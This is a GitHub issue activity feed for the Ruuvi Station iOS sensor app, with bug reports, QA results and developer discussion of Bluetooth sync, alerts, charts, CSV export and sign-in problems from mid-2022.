[2022-07-27 11:33] #858 closed

[2022-07-27 11:51] laurijamsa commented on #860
I encountered the same issue myself now on Android and WebUI when tried to share my sensor that has been months nearby a Gateway but it's not nearby a Gateway right now (Gateway has been offline 6 days). Would be probably better to allow sharing in these kinds of cases. But the question is, that how do we differentiate these cases from cases where user never had a Gateway nearby the sensor. Or do

[2022-07-27 11:59] laurijamsa commented on #902
Maybe we could allow adjusting alerts but if yes, then some other problems could appear. Then user could for example happily assume that alerts are working, even if the keep connection mode wasn't turned on or no connection can be established (sensor connected to another phone at the same time for example). Ideas on how to avoid these types of issues but showing alert sliders are welcome.

[2022-07-27 12:00] laurijamsa commented on #893
Our current assumption is that this is a backend issue. Closing this one.

[2022-07-27 12:01] laurijamsa commented on #975
These onboarding screens are being redesigned. Closing.

[2022-07-27 12:01] #975 closed

[2022-07-27 12:02] laurijamsa commented on #983
The onboarding screens are being completely resigned. Closing.

[2022-07-27 12:02] #983 closed

[2022-07-27 12:05] laurijamsa commented on #1022
Is this something we need to implement only on iOS and client side only? Or backend?

[2022-07-27 12:11] priyonto commented on #1022
@laurijamsa The endpint is already implemented on the cloud. We have to implement the endpoint on the client side only now. At this moment, we only know the users masked email after a failed claim operation. This implementation will show the owners email upfront on the settings page.

[2022-07-27 12:19] laurijamsa commented on #1004
I quickly checked abs humi graphs of a same sensor and iOS looks different than the others:

iOS:

<img width="928" alt="image" src="https://user-images.githubusercontent.com/1311912/181244099-69a77b72-5a20-4b1a-bea0-e9953f781b83.png">

Web:

<img width="1376" alt="image" src="https://user-images.githubusercontent.com/1311912/181244053-f7adfe89-b49f-443d-8fe4-45f31ce38a37.png">

Android:

<img wid

[2022-07-27 12:24] laurijamsa opened #1027 "Clear/sync buttons even visible even this phone has never heard a single bluetooth message from this cloud sensor shared to me"
And when I press sync, I get this error message: ident_ios": "UnexpectedError.callbackErrorAndResultAreNil"

<img width="969" alt="image" src="https://user-images.githubusercontent.com/1311912/181245675-78a26b40-bc1e-43ea-8af8-177d3ad73afa.png">

[2022-07-27 12:26] laurijamsa opened #1028 "History length selector doesn't fit to screen"
It's had to press the + button because it doesn't fit to the screen.

<img width="606" alt="image" src="https://user-images.githubusercontent.com/1311912/181246137-19f485f0-cae1-4a3d-9b84-2f6c1cf6b878.png">

[2022-07-27 15:41] priyonto commented on #999
@markoaamunkajo I tried to reproduce the issue following the steps for a while, but I couldn't. I also tried switching between other languages. But, I am going to make a few underlying improvements and will push an update tonight.

[2022-07-29 08:37] markoaamunkajo commented on #999
1.3.0(312)

User changed language from english to swedish after signing in to Ruuvi Cloud during onboarding, then immediately signed out and then changed system language to German.

Poof...sign in button from Menu has disappeared.
![IMG_8994](https://user-images.githubusercontent.com/50437378/181719531-7fe9dcef-f361-4e5b-92bb-b75eddbf3daa.PNG)

[2022-07-29 09:14] markoaamunkajo commented on #935
QA passed

[2022-07-29 09:17] markoaamunkajo opened #1033 "1.3.0(312) User disables triggered alert bell keeps blinking"
Description:

User has set temperature alert and it has triggered.
A blinking bell icon is displayed on sensor card.

He then disables alert in sensor settings page.

Actual: disabled alert bell keeps blinking
Expected: turn bell to greyed out disabled mode

https://user-images.githubusercontent.com/50437378/181727458-06c477d1-470b-4a48-ad50-d9024b7faca1.mp4

[2022-07-29 09:22] markoaamunkajo commented on #1023
QA passed for me I didn't spot it happening. @laurijamsa closing this for now

[2022-07-29 09:22] #1023 closed

[2022-07-29 09:25] markoaamunkajo opened #1034 "1.3(312) Extra space in front of "movements" on sensor card"
Description:

I believe I see extra space in front of "movements" text on sensor card
Also visible on other languages
![extra_space](https://user-images.githubusercontent.com/50437378/181729000-e0334eb6-623e-428f-9f8e-75faf94b1276.jpg)

[2022-07-29 09:29] markoaamunkajo commented on #949
1.3(312)

Please recheck font size on titles, if my eyes are seeing correctly feels like GENERAL is different size to ALERTS

![IMG_4910497D10EA-1](https://user-images.githubusercontent.com/50437378/181729709-297de96c-4fd5-4b55-8ede-c05b3f81c42b.jpeg)

[2022-07-29 09:39] markoaamunkajo opened #1035 "1.3.(312) GATT sync not successful if user leaves chart view"
Description:

User is GATT syncing multiple local sensors.
If he stays on charts page during sync he will get full data downloaded.
If he moves to sensor card or moves to view another sensor card during sync it will not download full data.

Expected:
GATT sync should always complete downloading sensor data even when user is on another sensor card or view.

https://user-images.githubusercontent.com

[2022-07-29 09:57] markoaamunkajo commented on #935
1.3(312)

Actually looks like humidity calculation is using temperature resolution value and it's incorrect, because humidity cannot then show more resolution.

Expected: Calculate from full resolution and only hide decimals and do rounding accordingly.

![photo_2022-07-29 16 57 00](https://user-images.githubusercontent.com/50437378/181734898-7fae9b2d-7d69-4c30-835d-3fc1eba4401b.jpeg)
![photo_2022

[2022-07-29 10:08] markoaamunkajo commented on #935
Looks like this also affects widgets. Resolution is missing 1 decimal for same, because that was the selected resolution.
![photo_2022-07-29 17 07 31](https://user-images.githubusercontent.com/50437378/181736908-3393cfac-5060-424c-807d-8e61cbd93cb4.jpeg)

[2022-07-29 16:18] DG12 opened #1036 "sync "Both callback result and error are nil" on connecting ... (312) defect"
sync to
66A9 both... nil (restart app, shutdown/start iPhone, no help )
20BC  connecting.,,.,,.,.,  never timeout.
0981 success: 07-19 12:24 to 07-29 12:19
230E 1,2,3..zip,zip, 317 stall! Cancel. Next attempt "Synchronizing..." stall, kill app
24C2  zip, zip,...594,643,440,480,701,723,743,753,000,819,841,843,15nn... zip, zip, success ( Why slow down between 59x and 14nn)
4D15 zip, zip 564,594,629,

[2022-07-31 01:38] DG12 opened #1037 "export (and data table) contains excessive data points (312) - defect"
Time periods between data points varies from 15 minutes to more than one per second!

36,595 rows !

[http://mybeacons.info/Porch_0981_20220729-1220.ods.gz](http://mybeacons.info/Porch_0981_20220729-1220.ods.gz)
includes delta time column, TX power column removed (date/time in rows 12-17 manually altered )

[http://mybeacons.info/Porch_0981_20220729-1220.csv.gz](http://mybeacons.info/Porch_0981_20

[2022-07-31 01:41] DG12 opened #1038 "export headings RSSI & Acceleration need quotes (312)"
"Date","Temperature (°F)","Humidity (%)","Pressure (inHg)",**RSSI** (dBm),**Acceleration X** (g),**Acceleration** Y (g),**Acceleration Z** (g),"Voltage (V)","Movement Counter" (movements),"Measurement Sequence Number","TX Power" (dBm)

[2022-07-31 17:43] priyonto commented on #949
@markoaamunkajo I have done extensive checking on this by recreating the UI. I don't think they are different.

[2022-07-31 18:54] priyonto commented on #1035
@markoaamunkajo
This was intentional since the iOS app doesn't support concurrent GATT sync; the sync currently gets canceled when the user leaves the sync state.
This is to prevent unexpected user experiences if a leaves a syncing page and moves to another card and tries to sync that card.

I can think of a few more ways to handle it at this moment:
1. Keep the background syncing for the tag, but

[2022-08-01 03:34] markoaamunkajo commented on #1033
QA passed

[2022-08-01 03:34] #1033 closed

[2022-08-01 03:40] markoaamunkajo opened #1045 "1.3.0(313) Alert range is reset on cloud sync"
Description:

BT Alert is reset upon cloud sync

User is logged into Ruuvi Cloud and using app in mixed mode (local bt and cloud).
User sets humidity alert and threshold so the alert would trigger, but actually the alert doesn't trigger with local Bluetooth. He then waits for synchronizing... text on sensor card and afterwards sees that humidity alert threshold range has been reset in sensor setti

[2022-08-01 03:42] markoaamunkajo commented on #949
Ok moving to done

[2022-08-01 03:42] #949 closed

[2022-08-01 03:44] markoaamunkajo commented on #1034
QA passed

[2022-08-01 03:44] #1034 closed

[2022-08-01 03:59] markoaamunkajo commented on #935
QA passed

[2022-08-01 03:59] #935 closed

[2022-08-01 12:23] DG12 opened #1046 "Enjoying Ruuvi Station ? does not submit (313)"
After rating 5 stars and tapping submit, nothing happens.

Should I rate it only 4 stars? :-
![ratingDOesntSubmit](https://user-images.githubusercontent.com/2365961/182146829-525e8b7e-d6d7-4fee-b9da-81fcb1640bb8.jpeg)
)

[2022-08-01 14:12] priyonto commented on #1046
That's because it is a dev build. Rating can be submitted only on the App store build :)

[2022-08-01 15:17] #1046 closed

[2022-08-02 15:15] DG12 opened #1047 "export icon should be on graph screen - improvment"
The Sensor Settings screen has the export icon but that does not export the settings.

The icon to export data points should be with the display of the data points.

[2022-08-02 17:14] DG12 commented on #1027
same as issue #1036 ?

[2022-08-04 04:32] markoaamunkajo commented on #1022
QA passed

[2022-08-04 04:33] markoaamunkajo commented on #1022
Sorry accidentally closed iOS card instead of Android..

[2022-08-08 03:06] markoaamunkajo commented on #1035
@priyonto yes I think 3 sounds most logical to me.

[2022-08-08 03:09] markoaamunkajo commented on #1004
@laurijamsa @priyonto so conclusion is that Apple uses different method and there is nothing we can do about it?

[2022-08-08 20:03] priyonto commented on #1035
@markoaamunkajo  Thanks. Would you be able to suggest the message for the alert, please? Thank you.

[2022-08-08 20:05] priyonto commented on #1004
@markoaamunkajo Kind of, but I wouldn't say we can't do anything about it. I mean, we can probably do the custom implementation if needed.

But, the reason for mentioning you in this card is to double-check the issue and confirm whether you can reproduce it. I have tried to reproduce it on my end, but I could not find any dissimilarities between the android and the iOS app.

[2022-08-14 15:04] markoaamunkajo commented on #1045
Gave more details about this case in dm will move back to @priyonto

[2022-08-16 20:03] priyonto opened #1053 "Make tags return to normal state after GATT sync is terminated before completion"
More on this card shared here: #1035

[2022-08-16 20:04] priyonto commented on #1035
The alert is implemented. However, the sync cancellation experience is not yet very smooth. It's highly recommended to wait until a sync is completed. Because once the sync is canceled before completion, it takes about 1 minute or so for the tag to return to normal BT state to read measurements or heartbeats. A separate card (#1053) is created for that issue.

[2022-08-16 20:12] priyonto opened #1055 "Show success/error message on settings change"

[2022-08-16 20:13] priyonto commented on #1045
I have improved a few related pages to this on build 314. However, I am not expecting magical improvement either. As we have discussed, the behavior is expected considering how the cloud sync is being performed at this moment. While in normal use cases the issue should not be critical, in cases like slow and unpredictable networks the changes may be lost.

The implementation of #746 should elimina

[2022-08-17 16:54] DG12 opened #1056 "tap sometimes does not respond (314)"
Some sensors respond immediately after first tab but,
others (example 4D15) require as many as 9 taps 1 second apart before opening settings screen.

I cannot not find any correlation as to blue tooth updates, cloud updated or virtual tags.

[2022-08-17 16:56] DG12 opened #1057 "Keep the Connection popup appears on first tap on settings gear -(314)"
![image](https://user-images.githubusercontent.com/2365961/185198440-47b4e414-00a8-47e4-a848-df4143ac2a0d.png)

For some tags,

[2022-08-18 20:30] priyonto commented on #1056
Hi, would you be able to attach a screen record, please? Thank you.

[2022-08-18 20:31] priyonto commented on #1057
This is the expected behavior. However, it should not appear after the first time. Please let us confirm whether it shows on the second or later tap. Thank you.

[2022-08-18 20:33] priyonto commented on #1047
A discussion has taken place on this, and it's under consideration with some other major improvements.

[2022-08-19 10:12] ojousima opened #1058 "Highlight the alerting value as WebUI does"
See also: https://feedback.ruuvi.com/posts/99/sensor-settings-page-for-alerting-sensor-should-highlight-offending-alert

[2022-08-19 22:09] DG12 commented on #1056
https://user-images.githubusercontent.com/2365961/185712889-2764ead2-aed1-49b0-9049-ec00a5e5dcb4.mp4
This is a new symptom as of 1.3.0(314)
4D15 and 230E and 22AB are within blue tooth range
No connection to gateway (i.e. cell & wifi are off) but they also usually do not respond.

[2022-08-20 14:30] priyonto commented on #1056
Thank you. We will investigate this.

[2022-08-20 18:21] DG12 commented on #1057
Seems confusing as there is no setting exposed at the time this appears.

are alerts enable even if not connected?

What about alerts from gateway?

this has always confused me :-? Can multiple tags be connected ?

[2022-08-20 18:24] priyonto commented on #1057
1. Local alerts are not available if not connected.
2. Gateway alerts are independent of this.
3. Yes, multiple tags can be connected simultaneously.

[2022-08-20 18:38] DG12 commented on #1036
Unable to duplicate at this time. Perhaps it’s fixed

[2022-08-21 08:59] markoaamunkajo commented on #999
QA passed for language change. Will open another issue for failing to remove all cloud cards on logout.

[2022-08-21 08:59] #999 closed

[2022-08-21 09:27] markoaamunkajo commented on #1028
QA passed

[2022-08-21 09:27] #1028 closed

[2022-08-21 09:32] markoaamunkajo commented on #1035
QA passed

[2022-08-21 09:32] #1035 closed

[2022-08-21 09:40] markoaamunkajo commented on #1035
Asked Elias about SE string because build release is near

[2022-08-21 10:36] markoaamunkajo commented on #1004
@laurijamsa I was not able to proof a difference on single sensor yet between various platforms. Here are my attempt csv's:

[Home outdoors _20220821-1709_Android_relative.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/9388885/Home.outdoors._20220821-1709_Android_relative.csv)
[Home outdoors _20220821-1709_web_relative.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/9388886/Ho

[2022-08-21 10:43] markoaamunkajo opened #1059 "1.3.0(314) Fix csv export name Dew point to Humidity"
Description:

User makes csv export on iOS and compares it with other platforms
Actual: with Humidity unit set to Dew Point his humidity title in export shows "Dew Point"
Expected: should be "Humidity (° selected temperature unit)" example "Humidity ℃"
![Dew_point_iOS_name](https://user-images.githubusercontent.com/50437378/185787302-69c8084e-28b2-4d9c-b946-80b7953193b2.jpg)

[2022-08-21 23:03] DG12 commented on #1056
I just had the same problem tapping on menu ( I.e. add new, app settings , about, …

[2022-08-23 10:54] laurijamsa commented on #921
We've decided in the meeting just to modify the settings text part to tell that the bg scanning setting interval is only bg history saving interval and alerts still come through all the time.

[2022-08-24 19:06] priyonto commented on #921
In addition- The investigation for several days on this card shows about 6-8% of battery consumption if several tags are used in the connected mode for 12 hours which is considered normal as Bluetooth scanning continues to run all the time in the background. Also, it should be noted that the consumption depends on the battery health of the device as well.

[2022-08-25 11:13] laurijamsa opened #1062 "Hide the add new virtual sensor part from the app"
We're planning to deprecate the virtual sensor feature step by step by first making it not possible to add new ones. This feature has no many users and we've received feedback about confusions where users think that they're adding a Ruuvi sensor but instead they added a virtual one. Some users are instead confused that virtual sensors show different temperature than Ruuvis do.

<img width="373" al

[2022-08-25 14:39] DG12 opened #1063 "with Database from 1.3.0(314) , using app 1.2.1(304) cannot add sensor."
After having version 1.3.0(304) running. Install 1.2.1(304) from appStore.

Attempt to add is quietly ignored.

reported by user Aki
I was alet to duplicate this (at least once)

Might this be an attempt to access the database without checking for exceptions?

[2022-08-25 18:19] priyonto commented on #921
We already have this mentioned on the background scanning that it's data logging interval. I am closing this issue, therefore.

[2022-08-25 18:19] #921 closed

[2022-08-25 22:13] DG12 commented on #1062
I like and use virtual sensors all the time.

Perhaps an app setting to permit them (initially disabled ) would be better, especially since they are already implemented.

[2022-08-29 03:09] DG12 opened #1065 "Cannot signin 1.3.0(314) - serious defect"
I am at home, good wifi connection , -50dBm.

tap signin
enter email
request code
received email
enter code

spin, spin, spin

https://user-images.githubusercontent.com/2365961/187115352-3a29405e-411f-481b-aead-a5dd2220907b.mp4

Cannot cancel, must kill app.

Restart app, works ok!

kill, restart app, enter code, spin,inip,spin, works!

logout,
kill, restart app, ...enter code, spin,spin,spin,spin

[2022-08-29 19:35] DG12 commented on #1036
Occurred again 66A9 ( its one of my favorites)

[2022-08-29 19:57] DG12 opened #1066 "neither sign out nor sign in is displayed - defect (314)"
Normally
if not signed offers signin
If signed in shows login and offers sign out

See attached with has neither:

![ruuviNotSingedNorOff](https://user-images.githubusercontent.com/2365961/187284966-f3d247ca-0faf-4a25-a2ae-2468edd3d068.PNG)

Normal signed in:
![ruuviSignedIn](https://user-images.githubusercontent.com/2365961/187286492-93ea5034-cc08-462f-b90e-af3328f80e95.PNG)

Normal signed out:
!

[2022-09-01 20:55] DG12 opened #1067 "Incorrect analysis of firmware version - 1.3.0(314) - defect - minor"
In situations where iPhone is at periphery of BT range, the app says firmware is"very old" for a while but eventually shows "v3.31.1+default".

Perhaps better wording would be "undetermined".

[2022-09-03 09:03] priyonto commented on #1057
Closing due to lack of activity.

[2022-09-03 09:03] #1057 closed

[2022-09-03 09:11] priyonto commented on #1036
Is the tag has latest firmware?

[2022-09-04 12:04] DG12 commented on #1036
SW: Ruuvi FWv3.31.1+debug
Should that matter?

[2022-09-04 12:08] priyonto commented on #1036
Yes, older fws had some issues but 3.31 should be working well. But,  the slow down issue is expected at the current latest firmware. We discussed about it and planning for a firmware update to improve that experience.

[2022-09-04 12:09] DG12 commented on #1036
I would think that station IOS should never report this regardless of what the tag does.

[2022-09-04 12:10] priyonto commented on #1036
I did not understand what you meant here!

[2022-09-04 12:13] DG12 commented on #1036
Station should either intercept or  check args this and display some "user friendly message".

[2022-09-04 12:15] priyonto commented on #1036
The error message popping shouldn't be there. So, yes, I will be checking that out.

[2022-09-04 12:16] DG12 commented on #1036
Thanks

[2022-09-04 12:17] DG12 commented on #1036
It is not that important. But it should be on the list.

[2022-09-05 14:56] DG12 opened #1068 "Attempting to get latest available Ruuvi Firmware version - times out"
After a very long :"The request timed out"

(I thought this used to work)

[2022-09-05 15:09] DG12 opened #1069 "sync stalls - - defect"
tag 230E is .5 meters away, receiving BT updates every 2,1 0 multiple sub zero intervals.
tapping cancel reports :
"history downloading via Bluetooth connection is in progress.Please wait:
![230E_Sync_0948](https://user-images.githubusercontent.com/2365961/188467281-2634189c-a001-4000-af84-73d4f656202f.PNG)
![230E_sync_0956](https://user-images.githubusercontent.com/2365961/188467312-cd6af780-8205

[2022-09-05 17:29] priyonto commented on #1068
Is the tag in range?

[2022-09-06 00:01] DG12 commented on #1068
Tag is .5 meters away.

[2022-09-08 16:35] priyonto commented on #1022
According to the discussion: We agreed to take a bit of time to discuss it more and implement it later. This is also related to the feature of force claiming a tag by the 'real' owner.

[2022-09-09 09:49] laurijamsa opened #1070 "Rounding on Y axis leads to big errors"
This video of toggling between 3 separate screenshots describes the issue better than thousand words:

https://user-images.githubusercontent.com/1311912/189322283-1e3c00c2-de87-47e4-b98a-81da0a19b5df.mov

[2022-09-12 06:12] priyonto opened #1071 "Plan the roadmap for dropping DF3 tags support from iOS app"

[2022-09-13 01:05] DG12 commented on #1071
Since the code is already present for format 03 is there a reason to "officially" drop support??

[2022-09-13 10:23] markoaamunkajo opened #1072 "Chart select baseline points incorrectly 01:00 instead 00:00"
Description:

Chart is selecting baseline points incorrectly, possibly due to summertime daylight saving settings.

Refer to same issue on Android board: https://github.com/ruuvi/com.ruuvi.station/issues/778

[2022-09-13 18:22] priyonto opened #1074 "Support iOS 16 lockscreen widget"

[2022-09-13 21:13] priyonto commented on #941
Known issue:
DF3 Sensors go into connected mode after firmware update and can't be disconnected. To solve this, kill the app and reopen it.

[2022-09-15 17:59] priyonto commented on #1070
@markoaamunkajo Need your help on this one. I was not able to reproduce the issue. Please try on your end too. Also we not have much information since it's user feedback. Thanks.

[2022-09-15 19:40] priyonto opened #1078 "Investigate the lagging and performance issues across the app"
- Card and tag settings pages have noticeably higher lagging than other pages.

[2022-09-16 12:56] andreevdenis commented on #1072
@priyonto my fix:
https://github.com/ruuvi/com.ruuvi.station/commit/c7ad81139124c9f91bce4fe3bacabc221fb30ce0
We should consider daylight saving for proper timeline. I didn't seen this issue because we don't have daylight saving here locally.

[2022-09-17 06:35] priyonto commented on #1072
Thank you @andreevdenis , I will make the same changes in iOS too. :)

[2022-09-17 10:22] priyonto commented on #1078
@rinat-enikeev Suggested moving the Ruuvi Cloud related implementations to the background thread. We will try implementing that for the cards page first.

[2022-09-18 15:50] markoaamunkajo commented on #1062
QA passed but have to remember to check migration.

[2022-09-18 15:50] #1062 closed

[2022-09-18 15:57] markoaamunkajo commented on #1059
QA passed

[2022-09-18 15:57] #1059 closed

[2022-09-19 00:31] markoaamunkajo commented on #1036
Unable to reproduce in latest build

[2022-09-19 00:31] #1036 closed

[2022-09-19 00:31] markoaamunkajo commented on #1027
QA passed

[2022-09-19 00:31] #1027 closed

[2022-09-19 00:50] markoaamunkajo commented on #941
1.3.0(315)

First update test after adding tag gave me this error after reaching 50%. Sensor was in df3 mode.

![IMG_9183](https://user-images.githubusercontent.com/50437378/190935298-790ce730-01c4-4457-acf4-0eb9305a1d6b.PNG)

Second update was successful. I don't have this sensor with any other phone at the moment.

[2022-09-19 08:24] #1002 closed

[2022-09-19 08:25] #1003 closed

[2022-09-19 08:59] sini-maaria commented on #1001
The icons could be even smaller.
(Don't mind the different gear icon, let's change it at some point.)

Image: Old icons on the left and the example how they should look. On the right is the current size.

<img width="1037" alt="Screenshot 2022-09-19 at 11 56 03" src="https://user-images.githubusercontent.com/19531763/190982878-9696aa68-45b5-4f42-b99a-4053cc889b7a.png">

[2022-09-19 09:00] #1000 closed

[2022-09-19 17:24] priyonto opened #1081 "Improve charts rendering speed and overall experience"
- Charts screen lags now when the full 10 days of data is rendered or when the draw dots are enabled with a good amount of measurements.

[2022-09-19 17:29] priyonto commented on #941
This error is not related to DF3 tags or the changes made on the migration. This is an error thrown by the DFU library itself while updating the firmware. This is the error: https://github.com/NordicSemiconductor/IOS-DFU-Library/blob/5906bc522a3eb2040644b1063019e3516456fdb1/iOSDFULibrary/Classes/Implementation/SecureDFU/Characteristics/SecureDFUControlPoint.swift#L275

I have no idea why this was

[2022-09-20 18:36] priyonto commented on #1001
The touch targets are same. Just the icons are smaller now. I am hoping it would be okay. But, you can share feedback when it's pushed.

[2022-09-21 13:44] laurijamsa opened #1083 "Cloud mode is not started after enabling it but after killing the app it is started correctly"

[2022-09-24 06:24] priyonto commented on #1081
Discussion on last week:
We will disable the "Draw Dots" feature for specific devices since it's a heavy operation that takes a lot of CPU and memory resources and older devices cannot handle that. However, we will continue to improve the chart rendering performance overall.

[2022-09-24 09:40] priyonto commented on #941
Decision: For these type of errors show an user understandable popup.

[2022-09-27 03:49] markoaamunkajo commented on #1070
@priyonto I cannot reproduce this yet on latest dev build. I can see rounding happening in the video though. Is it possible that this is some old build?

[2022-09-29 15:35] DG12 opened #1085 "Graph refreshes every 30 +/- seconds - (315) - defect"
Display graph "delays" for several seconds. Then graph appears.
Leaving the graph exposed for any of several ruuvi tags.
Suddenly, after 30 seconds +'- the screen blanks, graph lines appear then a few seconds the graph appears.
The [video](http://mybeacons.info/220929_graphRefreshesHyperVideo.html) is from an android in "hyperlapse" which shows a few minutes is several seconds.

[2022-10-06 16:26] priyonto opened #1088 "Alert settings not being saved to the cloud and old settings loaded after sync for the cloud sensors"

[2022-10-08 19:51] DG12 opened #1092 "Developer Mode required. 316"
Release build (316) requires developer mode enabled.
How do I do that?

![image](https://user-images.githubusercontent.com/2365961/194725550-56f47bf6-48c1-4300-a73a-6ee9bbbfa6b0.png)

PS
Firebase App Distribution requires deleting. app AND DATA.

[2022-10-08 21:09] priyonto commented on #1092
This is an iOS 16 setting. Please follow this:
https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device
<img width="981" alt="Screenshot 2022-10-08 at 11 08 54 PM" src="https://user-images.githubusercontent.com/24395776/194727903-2dcbecd2-ac8c-4419-8bf3-53696078301c.png">

[2022-10-09 00:57] DG12 commented on #1092
Thanks.

UGH! Apple is trying to cripple all of us.
Bad guys are winning because good guys cannot get anything done.

[2022-10-09 10:53] priyonto commented on #1092
Not sure what you mean, but closing this one :D

[2022-10-09 10:53] #1092 closed

[2022-10-10 02:57] markoaamunkajo commented on #1072
QA passed

[2022-10-10 02:57] #1072 closed

[2022-10-10 02:59] markoaamunkajo commented on #1066
Still appears in 1.3.0(317)

![IMG_BDE04C92A531-1](https://user-images.githubusercontent.com/50437378/194793647-318eed1f-7b85-46d4-be89-8d9e40adb2fe.jpeg)

[2022-10-10 03:02] laurijamsa commented on #1066
My Ruuvi Account link is there so all is good @markoaamunkajo

[2022-10-10 03:04] markoaamunkajo commented on #1066
Ah my bad I forgot it's new menu item

[2022-10-10 03:06] markoaamunkajo commented on #1062
Checked with TF build, QA passed

[2022-10-11 03:36] DG12 commented on #1066
"Sign in" is now on "main" screen.
Once user has signed in, "Sign in"  becomes "My Ruuvi Account".
"Sign out" is included on "My Ruuvi Account".

[2022-10-11 09:50] markoaamunkajo commented on #1019
@priyonto I requested deletion confirmation email on iOS app and opening it from Mac Mail app opens following URL:
https://station.ruuvi.com/verify-delete?token=8WQ9

Error: 404 not found

<img width="458" alt="Screenshot 2022-10-11 at 16 48 44" src="https://user-images.githubusercontent.com/50437378/195057703-88f2c89d-41af-4636-af4a-cd5e04060fdf.png">

[2022-10-12 15:34] DG12 opened #1093 "silent crash - 450A tapping settings -(318) - defect"
Crash seems to be only on "swamp 450A" tag.
see video.
Silent crash after various number of taps on gear. (First one a little slide, but other instances where many taps with no response.)

Is there any way I can send you the database from the phone??

https://user-images.githubusercontent.com/2365961/195385934-2a8e691b-b3e0-4702-9b98-0076694a2646.mp4

Can FLEX help?

![image](https://user-images.g

[2022-10-12 18:55] priyonto commented on #1019
Since tapping on the delete account sends email, the app side is working well. I have created a related issue on Ruuvi Cloud repo. Closing this one.

[2022-10-12 18:55] #1019 closed

[2022-10-14 10:52] markoaamunkajo opened #1094 "Unification: Add RSSI Alert"
Description:

Create RSSI Alert same as in Android App
Under Air Pressure and before Movement alerts

<img width="377" alt="Screenshot 2022-10-14 at 17 58 27" src="https://user-images.githubusercontent.com/50437378/195831310-f09af5e8-4c8d-4e37-9084-16dc81c915c7.png">

Add note under title

ENGLISH

Using this alert requires you to be signed in to the app, that you have claimed ownership of this se

[2022-10-15 03:23] markoaamunkajo commented on #1085
This is working for me, moving to done

[2022-10-15 03:56] markoaamunkajo commented on #1085
Reopened, it seems it doesn't work reliably, check attached video
For the case when it seemingly was working I was logged into Ruuvi Cloud and added local BT sensor.

https://user-images.githubusercontent.com/50437378/195967682-337fb55c-7a78-4272-92b6-6176bbfe8d41.mov

https://user-images.githubusercontent.com/50437378/195967690-3a026e5d-4916-4a80-a21a-db17e9d1146a.mov

[2022-10-15 04:04] markoaamunkajo commented on #827
Those are some fine big dots you got there @priyonto ! Can we make them small like in normal situation? It seems to normalise after over a minute has been recorded.

https://user-images.githubusercontent.com/50437378/195967912-d767703b-048e-48ae-bc97-bbcc1dbfda4e.MP4

[2022-10-15 04:07] markoaamunkajo commented on #1081
@priyonto When I signed in to cloud I always get dots in my charts. How do we define which devices get them?

[2022-10-15 05:05] markoaamunkajo commented on #1070
Reproduced. This will be fixed with new implementation for scaling Y-axis in charts

[2022-10-15 05:05] #1070 closed

[2022-10-15 05:11] markoaamunkajo opened #1095 "Scale Y-axis to logical values"
Description:

Currently X-axis implementation uses logical zoom grid values 1h, 30 minutes, 15 minutes, 10 minutes, etc. but Y-axis doesn't lock to logical grid values both in iOS and Android apps.

Apps should follow same implementation as on Web, where logical grid values are used already.

<img width="1436" alt="webui example 2" src="https://user-images.githubusercontent.com/50437378/195969911-

[2022-10-15 05:22] markoaamunkajo opened #1096 "Simplify displaying X-axis values"
Description:

Webui currently shows timestamp on single row and never both time and date on two rows.
Instead date is displayed when timestamp is 00:00.

Let's do this on both iOS and Android apps and show single row and date on 00:00.

Examples:

<img width="399" alt="dates_only" src="https://user-images.githubusercontent.com/50437378/195970326-9bff42ce-0526-44ca-a30d-8dedab613338.png">

<img wid

[2022-10-15 05:36] markoaamunkajo opened #1097 "Show cursor value on screen (just like on Android)"
Description:

Webui supports dragging mouse over chart and showing precise values under chart area as "Time and value".

Let's implement this to iOS and Android apps for showing precise timestamp and values when long tap on screen.
Example: Time 15:32:14 Temperature (20 °C)

![cursor_time_value](https://user-images.githubusercontent.com/50437378/195970872-f0cbe780-6181-4b04-9bfa-9d0025c5b4c5.jpg)

[2022-10-15 05:49] markoaamunkajo opened #1098 "Unification: show latest value in chart ()"
Description:

We recently added showing last recorded value in charts inside parenthesis in Android app.
Let's bring this to iOS app as well.

![lastrecordedvalue](https://user-images.githubusercontent.com/50437378/195971200-407a47ec-d5a5-46b3-a511-d0208c960dde.jpg)

Note also task about showing cursor value on long tap https://github.com/ruuvi/com.ruuvi.station.ios/issues/1097

[2022-10-15 06:08] markoaamunkajo opened #1099 "Remove warning alert indicator"
Description:

Let's remove this warning indicator from app, because it can be confused with alerts (in screenshot shown next to humidity).

![Warning_indicator](https://user-images.githubusercontent.com/50437378/195971850-278c5e5a-08cb-4bc3-913e-9426d046d45a.PNG)

[2022-10-15 06:22] priyonto commented on #1081
Showing dots from cloud issue is fixed but that build is mot yet pushed. I am expecting it to push tomorrow.

[2022-10-15 06:37] markoaamunkajo opened #1100 "Sound Alerts"
Description:

Implement same way as on Android
Card: https://github.com/ruuvi/com.ruuvi.station/issues/819

(Push alert settings will be handled on other card, this only for sound and settings)

[2022-10-15 06:55] markoaamunkajo opened #1101 "Fix Setting naming for Background"
Description:

Please rename app setting "Background" to use same strings as exists in Android app.
It's currently named incorrectly in iOS (switch should be called Background scanning and Data logging interval is title)

![bg_scanning](https://user-images.githubusercontent.com/50437378/195973651-e7b136aa-a888-446b-96a6-80d688d1587b.jpg)

[2022-10-15 07:06] markoaamunkajo opened #1102 "App freezing"
Description:

1.3.0(318)  iPhone 7, iOS 15.7

During testing I kept my device long time in Background setting page while making a card.
Then I noticed that app started behaving very badly - cannot move between cards, very sluggish to open chart view.

https://user-images.githubusercontent.com/50437378/195974024-6d6b2d7c-aa2c-4a00-b915-b4fb6771da8f.mov

My settings are
Signed into cloud, Cloud mode

[2022-10-15 07:07] markoaamunkajo opened #1103 "Alert bell opacity"
Description:

Alert bell opacity is changing when user is moving between sensor card and chart views. See attached video.

https://user-images.githubusercontent.com/50437378/195974069-3da7510f-7061-4008-b142-032fa8c6a4d2.mov

[2022-10-15 18:05] priyonto commented on #1066
Closing this one as this is working on the current dev build.

[2022-10-15 18:05] #1066 closed

[2022-10-15 18:22] priyonto commented on #827
This is a bug. I have fixed it, and should not be seen in the next dev build. At this moment, we decided to disable the dots completely for all the devices until we figure out a better way to do it.

[2022-10-18 05:25] markoaamunkajo commented on #1081
QA passed

[2022-10-18 05:25] #1081 closed

[2022-10-18 05:34] markoaamunkajo commented on #1085
@priyonto
1.3.0(319)
Logged into cloud, in mixed mode, then added one local BT sensor

Looks like if I have local sensor and I first make GATT sync and then Clear the chart I get no new dots drawn on the chart at all, even if I exit chart screen to sensor card screen and back. If I kill app I get new data drawn into chart.

